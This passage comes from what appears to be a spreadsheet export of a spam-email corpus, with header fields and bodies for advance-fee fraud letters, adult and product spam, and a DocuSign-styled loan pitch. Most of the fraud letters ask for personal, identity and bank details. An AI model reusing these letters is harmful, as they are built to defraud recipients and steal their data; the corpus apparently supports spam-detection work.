Since you \nare from the same country, so that the proceeds of this account valued at \nUS$10.5MD can be paid to you and then you and I can share the money. 50% to \nme and 40% to you, while 10% should be for expenses or tax as your \ngovernment may require. I have all necessary legal documents that can be \nused to back up any claim we may make.\nAll I require is your honest cooperation to enable us see this deal through \nand\nI guarantee that this will be executed under a legitimate arrangement that \nwill protect you from any breach of the law. Please direct your reply \nthrough this alternative mailbox if you are interested to enable us discuss \nfurther.\n\nYours Faithfully,\nBarrister Bruce Nelson Smith (Esq.).\n\n\nN.B. Please indicate your contact address, telephone, and fax numbers for \neasy communication in this mutual transaction.\n\n_________________________________________________________________\nDont just search. Find. Check out the new MSN Search! \n[URL]http://search.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2174</t>
  </si>
  <si>
    <t>To: R@M\nFrom: Emma Wuro &lt;wuroemma@yahoo.com.au&gt;\nDate: Tue, 06 Jun 2006 08:41:40 -0700</t>
  </si>
  <si>
    <t>Tue, 06 Jun 2006 08:41:40 -0700</t>
  </si>
  <si>
    <t>Emma Wuro &lt;wuroemma@yahoo.com.au&gt;</t>
  </si>
  <si>
    <t>TREAT AS URGENT PLEASE</t>
  </si>
  <si>
    <t>I have a new email address!You can now email me at: wuroemma@yahoo.com.au\n\nFrom: Emma Wuor\n\nIn London\n\n\n\nMy dear,\n\n\nTREAT AS URGENT PLEASE\n\n\nI am sorry for any inconveniences this could cause you,but be rest assured,as it comes with good intention.\n\n\nI am Emma Wuor former Minister of Post and Telecommunication in Liberia and a close associate to the former Liberian President Mr. Charles Taylor, who is presently arrested and taken into custody on war-crimes offence.\n\n\nBefore his arrest and detention, he deposited some amount of money in a in London through an investment company in Lagos-Nigeria where he was staying before his arrest.\n\n\nRecently when I visited Mr. Taylor in his detention camp he instructed me to arrange with you immediately and move this money to your country for safety and investment purposes. Be rest assured that you will be well rewarded if you can assist in this regard.\n\n\nFor the full story kindly visit this web news below: [URL]http://www.google.com[/URL]\n\n\nPlease get back to me immediately via Tel/Fax No. +44-870-135-3147 or\n\nE-mail:emmawuro@o2.pl\n\n\n\nYours faithfully,\n\nEmma Wuor\n\n\n\n\n- Emma Wuro\n\n</t>
  </si>
  <si>
    <t>527</t>
  </si>
  <si>
    <t>To: nkomo2004_026@fsmail.net\nFrom: michael nkomo &lt;nkomo2004_026@fsmail.net&gt;\nDate: Tue, 06 Jan 2004 02:13:46 +0100</t>
  </si>
  <si>
    <t>Tue, 06 Jan 2004 02:13:46 +0100</t>
  </si>
  <si>
    <t>michael nkomo &lt;nkomo2004_026@fsmail.net&gt;</t>
  </si>
  <si>
    <t>nkomo2004_026@fsmail.net</t>
  </si>
  <si>
    <t>GOOD DAY!!!!!</t>
  </si>
  <si>
    <t>Dear Sir,\n\nHow are you and your family today? I hope that you are all okay? I found\ninformation about you and decided to contact you for an important\nassistance. I am Michael Nkomo a citizen of Zimbabwe , but i am \ncontacting\nfrom a neiboring country here in IVORY CAOST where i am now\nsicking political assylum.\n\nI am the only son of Kenneth Nkomo, a wealthy farmer and senior \npolitician\nwith the opposition political party in my country, Movement for \nDemocratic\nChange [MDC]. My father was murdered by our wicked\nPresident, Robert Mugabe and I fled my country because I have become his\nnext target to eliminate.\n\nMy father was a fighter for Justice and a moving force in the MDC, a \npart\nwanting to end the several years of brutal dictatorship government of\nPresident Robert Mugabe. You will read more stories about President\nMugabe's brutal acts by visiting this web sites; \n[URL]http://www.rte.ie[/URL] \n\nMy father was accused of Treason and also assisting the White farmers in\nfighting the government. Few weeks after his arrest, he was reported \ndead.\nThe government claimed he died of heart attack and his body was never \nseen\nfor proper autopsy, they buried him in the government cemetery. My \nfather's\nassociate Mr. Martin Olds a White farmer from Britain assisted me in\nfighting my father's death through the\nCourt and media; the government saw us as a big treat to them and \ndecided to\neliminate us. Mr. Olds was attacked and murdered in his house, but\nfortunately, before they came looking for me, I received the news and I \nhad\nto flee through the border to South Africa to save my life. My arrival \nhere\nin IVORY COAST still remains like a miracle to me.\n\nHere, is my reasons for contacting you, I am having a huge sum of money\nin\nthe total sum of $13.6Million presently lodge with the security company \nin\nholland,My father kept this money in in two trunk boxes in disguise as\nfamily treasures and could not bank them,\nbecause of the situation in my country. My father's business, farms and\nbanks account were seized by the government before his arrest and murder.\n\nHe told me everything concerning the funds while he was still in \ndetention\nand I have made several arrangements concerning the shipment of the \nboxes\nout of my country because we cannot invest it there. I\nwas on the process when I fled the country. I need your assistance in\nsecuring the funds there in your country, so that I can arrange on how \nto\ncome overto your country to invest with the fund I am willing to offer \nyou\n30% of the $13.6Million for your assistance.\n\nPlease, let me know if you can assist me, so that I can give you more\ndetails on how we shall proceed. As I wait for your urgent response, \nplease\ntreat this information as top secret.\n\nRegards,\n\nMichael Nkomo\nFreeserve AnyTime - HALF PRICE for the first 3 months - Save £7.50 a month \n[URL]www.freeserve.com[/URL]</t>
  </si>
  <si>
    <t>http://www.rte.ie www.freeserve.com</t>
  </si>
  <si>
    <t>5721</t>
  </si>
  <si>
    <t>To: &lt;sitescooper-talk@example.sourceforge.net&gt;\nFrom: Bahtiyar C &lt;gxihba@aol.com&gt;\nDate: Tue, 06 Aug 2002 14:03:42 +0200</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 14:03:42 +0200</t>
  </si>
  <si>
    <t>Bahtiyar C &lt;gxihba@aol.com&gt;</t>
  </si>
  <si>
    <t>[scoop] Liseli kayit</t>
  </si>
  <si>
    <t>PEhUTUw+PEhFQUQ+PFRJVExFPkV2IHlhcGltaSBhbWF09nIgdmlkZW9sYXIgdHFka3FqZG5s\nIDwvVElUTEU+PC9IRUFEPjxCT0RZPg0KPERJViBBTElHTj0iY2VudGVyIj48VEFCTEUgYm9y\nZGVyPTAgY2VsbFBhZGRpbmc9MCBjZWxsU3BhY2luZz0wIHdpZHRoPTYwMD4NCiAgPFRCT0RZ\nPg0KICA8VFI+DQogICAgPFREIGNvbFNwYW49Mz4NCiAgICAgIDxQIGFsaWduPWNlbnRlcj4m\nbmJzcDs8L1A+DQogICAgICA8UCBhbGlnbj1jZW50ZXI+PEZPTlQgZmFjZT1WZXJkYW5hPjxC\nPlllbmkgVmlkZW9sYXIgRWtsZW5kaTs8L0I+PC9GT05UPjwvUD4NCiAgICAgIDxVTD4NCiAg\nICAgICAgPExJPg0KICAgICAgICA8UCBhbGlnbj1jZW50ZXI+PEZPTlQgZmFjZT1WZXJkYW5h\nPjxCPjxBIEhSRUY9Imh0dHA6Ly93d3cuc2Vrc2xpc2VzaS5jb20iPis1NjAgYWRldCB2aWRl\nbyA6IDM4IHRhbmVzaSBFdiANCiAgICAgICAgeWFwaW1pPC9BPjwvQj48L0ZPTlQ+PC9QPg0K\nICAgICAgICA8TEk+DQogICAgICAgIDxQIGFsaWduPWNlbnRlcj48Rk9OVCBmYWNlPVZlcmRh\nbmE+PEI+PEEgSFJFRj0iaHR0cDovL3d3dy5zZWtzbGlzZXNpLmNvbSI+MTIwIEFkZXQgSGlr\nYXllPC9BPjwvQj48L0ZPTlQ+PC9QPg0KICAgICAgICA8TEk+DQogICAgICAgIDxQIGFsaWdu\nPWNlbnRlcj48Rk9OVCBmYWNlPVZlcmRhbmE+PEI+PEEgSFJFRj0iaHR0cDovL3d3dy5zZWtz\nbGlzZXNpLmNvbSI+S2FkaW5sYXJpbiBPcmdhem0gDQpWaWRlb2xhcmk8L0E+PC9CPjwvRk9O\nVD48L1A+DQogICAgICAgIDxMST4NCiAgICAgICAgPFAgYWxpZ249Y2VudGVyPjxGT05UIGZh\nY2U9VmVyZGFuYT48Qj48QSBIUkVGPSJodHRwOi8vd3d3LnNla3NsaXNlc2kuY29tIj5EZXZv\nbiB2ZSBTeWx2aWEgU2FpbnRpbiANCiAgICAgICAgVmlkZW9sYXJpLNxubPxsZXI8L0E+PC9C\nPjwvRk9OVD48L1A+DQogICAgICAgIDxMST4NCiAgICAgICAgPFAgYWxpZ249Y2VudGVyPjxG\nT05UIGZhY2U9VmVyZGFuYT48Qj48QSBIUkVGPSJodHRwOi8vd3d3LnNla3NsaXNlc2kuY29t\nIj41IEFkZXQgQWR1bHQgQm91bmNlciBTaWZyZSAoMjcwMEdCIA0KICAgICAgICBGaWxtKTwv\nQT48L0I+PC9GT05UPjwvUD4NCiAgICAgICAgPExJPg0KICAgICAgICA8UCBhbGlnbj1jZW50\nZXI+PEZPTlQgZmFjZT1WZXJkYW5hPjxCPjxBIEhSRUY9Imh0dHA6Ly93d3cuc2Vrc2xpc2Vz\naS5jb20iPkZsYXNoIFBvcm5vIFZpZGVvbGFyLCAgSGVyc2V5IA0KYnVyYWRhPC9BPjwvQj48\nL0ZPTlQ+PC9QPjwvTEk+PC9VTD4NCiAgICAgIDxQIGFsaWduPWNlbnRlcj48Qj4mbmJzcDs8\nL0I+PC9QPg0KICAgICAgPFAgYWxpZ249Y2VudGVyPjxTVFJPTkc+Jm5ic3A7PEZPTlQgY29s\nb3I9I2ZmMDAwMD5GaWxtbGVyaW4gYm95dXRsYXJpIGtpc2Egb2xkdWd1bmRhbiBoaXpsaSBk\nb3dubG9hZDxCUj4NCgkgIDxBIEhSRUY9Imh0dHA6Ly93d3cuc2Vrc2xpc2VzaS5jb20iPjxG\nT05UIEZBQ0U9IlZlcmRhbmEsIEFyaWFsIiBTSVpFPSszIA0KQ09MT1I9IiNGRjAwRkYiPjxC\nPnd3dy5TZWtzTGlzZXNpLmNvbTwvQj48L0ZPTlQ+PC9BPjwvRk9OVD48L1NUUk9ORz48L1A+\nPC9URD48L1RSPjwvVEJPRFk+PC9UQUJMRT48L0RJVj4NCjwvQk9EWT48L0hUTUw+DQo=\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSitescooper-talk mailing list\nSitescooper-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>5738</t>
  </si>
  <si>
    <t>To: &lt;webmaster@efasoftware.com&gt;\nFrom: "Amy Barriento" &lt;vheystarta@hotmail.com&gt;\nDate: Tue, 06 Aug 2002 12:58:46 -1700</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 12:58:46 -1700</t>
  </si>
  <si>
    <t>"Amy Barriento" &lt;vheystarta@hotmail.com&gt;</t>
  </si>
  <si>
    <t>&lt;webmaster@efasoftware.com&gt;</t>
  </si>
  <si>
    <t>Clean your credit right from your computer!        6486</t>
  </si>
  <si>
    <t xml:space="preserve">  \n| ![](3D[URL]http://365.pakoa.com[/URL]  \n![](3D[URL]http://365.pakoa.com[/URL]  \n  \n![3D""](3D=)=  \nThank You,  \n![](3D[URL]http://365.pakoa.com[/URL]  \n  \n---  \n![](3D[URL]http://365.pakoa.com[/URL]  \n  \nYour email address was obtained from a purch= ased list, Reference #\n1320-15000.  If you wish to unsubscribe from t= his list, please Click here\nand enter = your name into the remove box. If you have previously unsubscribed\nand are still receiving this message, you may email our Abuse Control= Center,\nor call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way, Miami, FL,\n33155".  \n  \n![](3D[URL]http://365.pakoa.com[/URL]  \n(C) 2002 Web Credit Inc. All Rights Reser= ved.  \n  \n\n</t>
  </si>
  <si>
    <t>http://365.pakoa.com http://365.pakoa.com http://365.pakoa.com http://365.pakoa.com http://365.pakoa.com</t>
  </si>
  <si>
    <t>5716</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "info@chinabusinesstravel.com" &lt;info@chinabusinesstravel.com&gt;\nDate: Tue, 06 Aug 2002 12:34:20 +0800</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 12:34:20 +0800</t>
  </si>
  <si>
    <t>"info@chinabusinesstravel.com" &lt;info@chinabusinesstravel.com&gt;</t>
  </si>
  <si>
    <t>Valuable Business Information Of China</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format --717fbb98-2427-46fa-b1fc-01aeb8d47c3f Content-Type: text/html; charset=gb2312 Content-Transfer-Encoding: quoted-printable Travel to China,Welcome to China business travel! We are an agency = specializing   in business and personal travel services to China. If you want to take any = activity in China, please contact us. We will try our best to offer you the = top services.   If this email bothers you, please forgive us. We sincerely hope you will   consider using our services.     BIZ        Tour BIZ        Consulting Tour =       Packages China        Adventure Customized        Tour =            The                    people's Republic of China Natural                    Conditions Political                    System Industries                    and Infrastructure Foreign                    Trade Laws Import                    and Export Procedures Policy                    on Foreign Establishment                    and Termination Establishment                    of Representative Offices Arrival                    and Departure Customs                    Declaration  Passports                    and Visas  Right                    of Residence Communications =                    Transportation                     Accommodation                    and Shopping Medical                    &amp; Health Sightseeing China                    Business Tour                   Today China remains the fastest growing economy in the = world,                    China is predicted to become the world's largest economic = center                    by the year 2030. If you have not been to China yet, the = opportunity                    is here, the time is now. Read  =                   the detail &gt;&gt;   China Business = Assistant                     Through our experiences, we know the value of face-to-face = meetings                    in the international arena, and how developing trust and = respect                    with trading partners goes a long way toward ensuring = mutual                    success. Read                    the detail &gt;&gt;  China                    Customized Tour An itinerary can be arranged to meet = your                                                 individual requirement; to include visiting = relatives,                                                 friends, and business contacts. Read                          the detail &gt;&gt;    Exhibitions of = China                                                      2002   Accessorie= s                                     Aeronautic= s Agriculture Automobile= s Building Chemical                                    Industry Clothing Clo= thing                                    Machinery Construction                                    Machinery Computer                                    &amp; Communication Cosmetics Craftsman`s  =                                   Equipment Educationa= l                                    Materials Electronic= s Energy =                                   Food                                    &amp; Tobacco &amp; Wine Food                                    Machines &amp; Packaging Furniture Health  =                                   &amp; Medical Hotel                                    and Restaurant Industrial  =                                   Equipment  Interior                                    Design Leather                                     Logos                                    &amp; Advertising &amp; Design Machine                                    Tools Nursery                                    Equipment Paper                                    &amp; Printing Railway                                    &amp; Transport Safety                                    &amp; Fire Protection Scintefic                                    Equipment Sports                                    Equipment Tools Toys Travel =                                   Waste                                    Technology Other                                    Trade Fairs Fairs                                    for Consumer Goods                           We provide information query for all the exhibitions = in                               China every year, and offer various consulting = services                               for potential clients who have the intent to take = part                               in exhibitions in China.       China                    Tour Packages   China                          Civilization   East                          China Splendor   Memorial                          China   Silk                          Road Adventure  Yangtze                          River Cruises  Minority                          Wander  Mystical                          Tibet  China                    Adventure Drifting                          Tour Traveling                          on Foot Self-Driving                          Tour Martial                          Arts and Fitness Tour                        =                            Copyright © 2002 = Chinabusinesstravel,All                                     Rights Reserved E-mail:info@chinabusinesstravel.com    --717fbb98-2427-46fa-b1fc-01aeb8d47c3f-- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5740</t>
  </si>
  <si>
    <t>To: &lt;ellendew@aol.com&gt;\nFrom: "Kylie" &lt;wa9sywc1k06312@yahoo.com&gt;\nDate: Tue, 06 Aug 2002 11:36:13 -1900</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 11:36:13 -1900</t>
  </si>
  <si>
    <t>"Kylie" &lt;wa9sywc1k06312@yahoo.com&gt;</t>
  </si>
  <si>
    <t>Toners and inkjet cartridges for less....          BLOEEYS</t>
  </si>
  <si>
    <t>Tremendous Savings on Toners,  Inkjets, FAX, and Thermal Replenishables!! Toners 2 Go is your secret weapon to lowering your cost for High Quality, Low-Cost printer supplies!  We have been in the printer replenishables business since 1992, and pride ourselves on rapid response and outstanding customer service.  What we sell are 100% compatible replacements for Epson, Canon, Hewlett Packard, Xerox, Okidata, Brother, and Lexmark; products that meet and often exceed original manufacturer's specifications. Check out these prices!         Epson Stylus Color inkjet cartridge (SO20108):     Epson's Price: $27.99     Toners2Go price: $9.95!        HP LaserJet 4 Toner Cartridge (92298A):           = ; HP's Price: $88.99            Toners2Go   price: $41.75!   Come visit us on the web to check out our hundreds of similar bargains at Toners 2 Go!      request to be removed by clicking HERE srgreen [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5734</t>
  </si>
  <si>
    <t>To: &lt;Valued.Customers@webnote.net&gt;\nFrom: "MALORIE HOGUE" &lt;lakskjdhjfh@msn.com&gt;\nDate: Tue, 06 Aug 2002 07:54:41 -1700</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 07:54:41 -1700</t>
  </si>
  <si>
    <t>"MALORIE HOGUE" &lt;lakskjdhjfh@msn.com&gt;</t>
  </si>
  <si>
    <t>&lt;Valued.Customers@webnote.net&gt;</t>
  </si>
  <si>
    <t>Fw: Keep it under wraps, but this one works a treat!            ADGHRVIKMM</t>
  </si>
  <si>
    <t xml:space="preserve">  \n| ![](3D[URL]http://365.pakoa.com[/URL]  \n![](3D[URL]http://365.pakoa.com[/URL]  \n  \n![3D""](3D=)=  \nThank You,  \n![](3D[URL]http://365.pakoa.com[/URL]  \n  \n---  \n![](3D[URL]http://365.pakoa.com[/URL]  \n  \nYour email address was obtained from a purch= ased list, Reference #\n1580-17600.  If you wish to unsubscribe from t= his list, please Click here\nand e= nter your name into the remove box. If you have previously unsubscribed\nand are still receiving this message, you may email our Abuse Control= Center,\nor call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way, Miami, FL,\n33155".  \n  \n![](3D[URL]http://365.pakoa.com[/URL]  \n(C) 2002 Web Credit Inc. All Rights Reser= ved.  \n  \n\n</t>
  </si>
  <si>
    <t>5732</t>
  </si>
  <si>
    <t>To: ilug@linux.ie, ilug-request@linux.ie\nFrom: napkin &lt;napkin@mailhost.com&gt;\nDate: Tue, 06 Aug 2002 06:50:21 PM -0400</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 06:50:21 PM -0400</t>
  </si>
  <si>
    <t>napkin &lt;napkin@mailhost.com&gt;</t>
  </si>
  <si>
    <t>ilug@linux.ie, ilug-request@linux.ie</t>
  </si>
  <si>
    <t>[ILUG] Re: whats up -colonize</t>
  </si>
  <si>
    <t>YOU HAVE NEVER SEEN A DILDO SITE LIKE THIS ONE!!\nExtreme never seen before pictures and content\n[URL]http://www.supremewebhosting-online.com[/URL]\n\nJoin in the fun as the girls REAM in objects like never before\n[URL]http://www.supremewebhosting-online.com[/URL]\n\n\n\n\n\n\n\n\n\n\nThis is NOT SPAM - You have received this e-mail because at one time or another you\nentered the weekly draw at one of our portals or sites. We comply with all proposed and\ncurrent laws on commercial e-mail under (Bill s. 1618 TITLE III passed by the 105th Congress).\nIf you have received this e-mail in error, we apologize for the inconvenience and ask\nthat you remove yourself. Just go to [URL]http://200.38.128.154[/URL]\n\nhardships\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.supremewebhosting-online.com http://www.supremewebhosting-online.com http://200.38.128.154 http://www.linux.ie</t>
  </si>
  <si>
    <t>2478</t>
  </si>
  <si>
    <t>To: nan\nFrom: chrisbartholet092@adinet.com.uy &lt;chrisbartholet092@adinet.com.uy&gt;\nDate: Tue, 05 Sep 2006 20:45:26 -0300</t>
  </si>
  <si>
    <t>Tue, 05 Sep 2006 20:45:26 -0300</t>
  </si>
  <si>
    <t>chrisbartholet092@adinet.com.uy &lt;chrisbartholet092@adinet.com.uy&gt;</t>
  </si>
  <si>
    <t>CAN WE HANDLE THIS TOGETHER?</t>
  </si>
  <si>
    <t>FROM THE DESK OF MR.CHRIS BARHOLET.\nBILL AND EXCHANGE MANAGER,\nMETROPOLITAN BOND AND FINANCE CO.LTD LONDON.\n48 Moorfields, London EC2Y 9AL.                       \n               \n                 \nDEAR Friend,\n\nI am the manager of bill and exchange at the auditing of METROPIOLITAN \nBOND AND FINANCE CO.LTD. in England In my department we discovered an \nabandoned sum of 27.5 Pound sterling (Twenty-Seven  Million-five \nhundred thousand Pounds sterling) in an account that belongs to one of \nour foreign customer who died along with his entire family on Monday, \n31 July, 2000 in a plane crash in paris.Please to confirm my story \nabout the crash you can visit this site:[URL]http://news.bbc.co[/URL]\nuk/1/hi/world/europe/859479.stm Since we got information about his \ndeath, we have been expecting his next of kin to come over and claim \nhis money because we cannot release it unless some body applies for it \nas next of kin or relation to the deceased as indicated in our \nfinancial guidelines and laws but unfortunately we learnt that all his \nsupposed next of kin or relation died alongside with him at the plane \ncrash leaving nobody behind for the claim. It is\ntherefore upon this discovery that I now decided to make this business \nproposal to you and release themoney to you as the next of kin or \nrelation to the deceased for safety and subsequent disbursement \nsincenobody is coming for it and we don't want this money to go into \nthe bank treasury as unclaimed bill.The banking and financial law and \nguide line here stipulates that if such money remained unclaimed \nafterSEVEN years, the money will be transfered into the bank treasury \nas unclaimed fund. The request offoreigner as next of kin in this \nbusiness is occassioned by the fact that the customer was a foreigner \nand a national here cannot stand as next ofkin to a foreigner.\n\nI agree that 40% of this money will be for you as a respect to the \nprovision of a foriegn account ,10%will be set aside for expenses \nincurred during the business and 50% would be for me Thereafter, I \nwillvisit your country for disbursement according to the percentage \nindicated Therefore, to enable theimmediate transfer of this fund to \nyour country ,you must apply first to our security firm here in London \nbecause of financial laws guiding this country,we have moved the money \nin question to our Security Company Vault here in London for easy \ntransfer of this fund to any where in the world.So i will like you to \nsend tome your NAME,TELEPHONE NUMBER and PHYSICAL ADDRESS for easy and \neffective communication and location where in\nthe money is bound to.\n\nUpon receipt of your reply, I will get back to you on the next moves \nto make. I will not fail to bring to your notice that thistransaction \nis hitch-free and that you should notentertain any atom of fear as all \nrequiredarrangements have been made for the transfer. You should \ncontact me immediately as soon as you receive\nthis letter.\n\nTrusting to hear from you immediately.\nYours Faithfully,\nMR.CHRIS BARTHOLET.\n\n\n\n</t>
  </si>
  <si>
    <t>976</t>
  </si>
  <si>
    <t>To: "Business Owner" &lt;jose@monkey.org&gt;\nFrom: "Lisa Wilson via DocuSign" &lt;dse_NA3@docusign.net&gt;\nDate: Tue, 05 Mar 2019 13:14:25 -0800</t>
  </si>
  <si>
    <t>Tue, 05 Mar 2019 13:14:25 -0800</t>
  </si>
  <si>
    <t>Hello Business Owner, Lisa Wilson has sent you a new DocuSign document to view and sign. Please click on the link below to begin signing. Hello, we received your inquiry for funding and can have your business approved within minutes. Terms up to 18 months with weekly payment options. We are a direct lender and can have you approved within minutes. APPLY NOW to see what you are approved for. Complete the Docusign application &amp; also attach the last 6 months of your business bank statements. If you have trouble attaching, you can reply back to this email with the statements or fax statements to 516-331-0696. Our direct line is 516-331-0689. To unsubscribe: [URL]https://criticalfinance.wufoo.com[/URL]      REVIEW DOCUMENT [URL]https://na3.docusign.net[/URL] If clicking the link does not work, you can highlight and copy the entire line above and paste it into your browser to get started. This message was sent to you by Lisa Wilson who is using the DocuSign Electronic Signature Service. If you would rather not receive email from this sender you may contact the sender with your request. Do Not Share This Email This email contains a secure link to DocuSign. Please do not share this email, link, or access code with others. Questions about the Document? If you need to modify the document or have questions about the details in the document, please reach out to the sender by emailing them directly. If you are having trouble signing the document, please visit the Help with Signing page on our Support Center. [URL]https://support.docusign.com[/URL] EnvelopeActivation Lisa Wilson sent you a document to review and sign.  REVIEW DOCUMENT  Lisa Wilson lisa@expandthebiz.comHello, we received your inquiry for funding and can have your business approved within minutes. Terms up to 18 months with weekly payment options. We are a direct lender and can have you approved within minutes. APPLY NOW to see what you are approved for. Complete the Docusign application &amp; also attach the last 6 months of your business bank statements. If you have trouble attaching, you can reply back to this email with the statements or fax statements to 516-331-0696. Our direct line is 516-331-0689. To unsubscribe: [URL]https://criticalfinance.wufoo.com[/URL] Not Share This Email This email contains a secure link to DocuSign. Please do not share this email, link, or access code with others.Alternate Signing Method Visit DocuSign.com, click 'Access Documents', and enter the security code: 7143E8C89ABE4576BCAA38D194E85C893 About DocuSign Sign documents electronically in just minutes. It's safe, secure, and legally binding. Whether you're in an office, at home, on-the-go -- or even across the globe -- DocuSign provides a professional trusted solution for Digital Transaction Management™. Questions about the Document? If you need to modify the document or have questions about the details in the document, please reach out to the sender by emailing them directly. If you are having trouble signing the document, please visit the Help with Signing page on our Support Center.Download the DocuSign AppThis message was sent to you by Lisa Wilson who is using the DocuSign Electronic Signature Service. If you would rather not receive email from this sender you may contact the sender with your request.</t>
  </si>
  <si>
    <t>2769</t>
  </si>
  <si>
    <t>To: nan\nFrom: SUSAN .H. ROSE &lt;susan01@tiscali.de&gt;\nDate: Tue, 05 Dec 2006 17:13:36 +0100</t>
  </si>
  <si>
    <t>Tue, 05 Dec 2006 17:13:36 +0100</t>
  </si>
  <si>
    <t>SUSAN .H. ROSE &lt;susan01@tiscali.de&gt;</t>
  </si>
  <si>
    <t>CHIEF AUDITOR TO THE PRESIDENT</t>
  </si>
  <si>
    <t>OFFICE OF THE DIRECTOR OF OPERATION\nINTERNATIONAL CREDIT SETTLEMENT, \nCENTRAL BANK OF NIGERIA\n \nATTENTION: BENEFICIARY\n \nTHIS IS TO OFFICIALLY INFORM YOU THAT WE HAVE VERIFIED\nYOUR CONTRACT /INHERITANCE FILE AND FOUND OUT THAT WHY YOU HAVE NOT \nRECEIVED YOUR PAYMENT IS BECAUSE YOU HAVE NOT FUFILLED THE\nOBLIGATIONS GIVEN TO YOU IN RESPECT OF YOUR CONTRACT/INHERITANCE \nPAYMENT.\n\nTHIS CARD CENTER WILL SEND YOU AN ATM CARD WHICH YOU\nWILL USE TO WITHDRAW YOUR MONEY IN ANY ATM MACHINE IN ANY PART OF THE \nWORLD, BUT THE MAXIMUM IS ONE THOUSAND, FIVE HUNDRED UNITED STATES \nDOLLARS PER DAY.SO IF YOU LIKE TO RECEIVE YOUR FUND IN THIS WAY, PLEASE \nLET US KNOW BY CONTACTING THE ATM PAYMENT DEPARTMENT AND ALSO SEND THE \nFOLLOWING INFORMATION AS LISTED BELOW.\n \n1. FULL NAME\n2. PHONE AND FAX NUMBER\n3. ADDRESS WERE YOU WANT THEM TO SEND THE ATM CARD\nTO(P.O BOX NOT \nACCEPTABLE) \n4. YOUR AGE AND CURRENT OCCUPATION\n5. ATTACH  COPY OF YOUR IDENTIFICATION\n \nHOWEVER, KINDLY FIND BELOW THE CONTACT PERSON:\n \nDIRECTOR, ATM PAYMENT DEPARTMENT\nCELL: 234-80-54260-455 \nEMAIL:rosemarry_susan01@yahoo.fr \n \nTHE ATM CARD PAYMENT CENTER HAS BEEN MANDATED TO ISSUE\nOUT $8,300,000.00 AS PART PAYMENT FOR THIS FISCAL YEAR\n2006. ALSO FOR YOUR INFORMATION, YOU HAVE TO STOP ANY FURTHER\nCOMMINUCATION WITH ANY OTHER PERSON(S) OR OFFICE(s) TO AVOID ANY \nHITCHES IN RECEIVING YOUR PAYMENT.\n \nNOTE THAT BECAUSE OF IMPOSTORS, WE HEREBY ISSUED YOU\nOUR CODE OF CONDUCT, WHICH IS (ATM-811) SO YOU HAVE TO INDICATE\nTHIS CODE WHEN CONTACTING THE CARD CENTER BY USING IT AS YOUR\nSUBJECT.\n \nREGARDS,\n \nMRs.Susan Harrison  \nCHIEF AUDITOR TO THE PRESIDENT\nFEDERAL REPUBLIC OF NIGERIA\n\n\n\n\n\n\n\n\nEndlich Sicherheit bei Computerabstuerzen - Phoenix Recover Pro. [URL]http://internetzugang.tiscali.de[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://internetzugang.tiscali.de</t>
  </si>
  <si>
    <t>2768</t>
  </si>
  <si>
    <t>To: nan\nFrom: Melika Diouf &lt;melika_der_diouf_22@hotmail.com&gt;\nDate: Tue, 05 Dec 2006 12:50:46 +0000</t>
  </si>
  <si>
    <t>Tue, 05 Dec 2006 12:50:46 +0000</t>
  </si>
  <si>
    <t>Melika Diouf &lt;melika_der_diouf_22@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Mrs MELIKA DIOUF, TREAT VERY URGENT AND CONFIDENTIAL</t>
  </si>
  <si>
    <t>Dear Friend,\n\nI apologize if the contents in this mail are contrary to your moral ethics, \nwhich I feel may be of great disturbance to your personal life, But please \ntreat with absolute secrecy and personal. I pray that this email reaches you \nin the best of health.\n\nI am Mrs will dera ahmed, born melika diouf, banking profession, mother of \nthree children\n\nthe manager of bill and  exchange at the foreign remittance department Bank \nOf Africa. In my  department we discoveredan  abandoned sum of US$14.5M \n(fourteen million five  hundred thousand US dollars) in an account that \nbelongs to one of our  foreign customer who died along with his family in \nthe 2000 in a plane crash.\n\nSince we got information about his death, we have  been expecting his next \nof  kin to come over and claim his money because we cannot release it unless \n  some body applies for it as next of kin or relation  to the deceased as  \nindicated in our banking guide lines and lawsbut  unfortunately we learnt \nthat all his supposed next of kin or relation died  alongside with him at \nthe plane crash leaving nobody behind for the claim.\n\nIt is therefore upon this discovery that I now  decided to make this \nbusiness  proposal to you and release the money to you as the next of kin or \nrelation  to the deceased for safety and subsequent disbursement since \nnobody is  coming for it and we don't want this  money to  go  into the bank \ntreasury as   unclaimed bill.\n\nThe banking law and guidelines here stipulates that  if such money remained \nunclaimed after six years, the money will be transferred into the bank  \ntreasury as unclaimed fund.\n\nThe request of foreigner  as next of kin in this  business is occasioned by\nthe fact that the customer  was a foreigner and a Burkina cannot stand as \nnext of kin to a foreigner. I agree that 45% of this money will be for you \nas  respect to the provision of a foreign account , 5% will be set aside for \nexpenses incurred during the  business and 50% be for me.\n\nThereafter, I will visit your country for disbursement according to the \npercentage indicated. Therefore, to enable the immediate transfer of this  \nfund to you as arranged, you must apply first to the  bank as relation or  \nnext of kin of the deceased indicating your bank name, your bank account  \nnumber, your private telephone and fax number for easy and effective\ncommunication and location where the money will be  transfer.\n\nUpon receipt of your reply, I will send to you by  fax or email the text of \nthe application. I will not fail to bring to your  notice that this \ntransaction is hitch-free and that you should not entertain any atom of fear \nas all required arrangements have been made for the transfer. You should \ncontact me immediately as soon as you  receive this mail,\n\nTrusting to hear from you immediately.\n\nYours faithfully.\n\nMrs MELIKA DIOUF,\n\nN/B: CALL ME AS SOON AS YOU RECEIVE THIS MAIL OR WRITE EMAIL,AND YOU 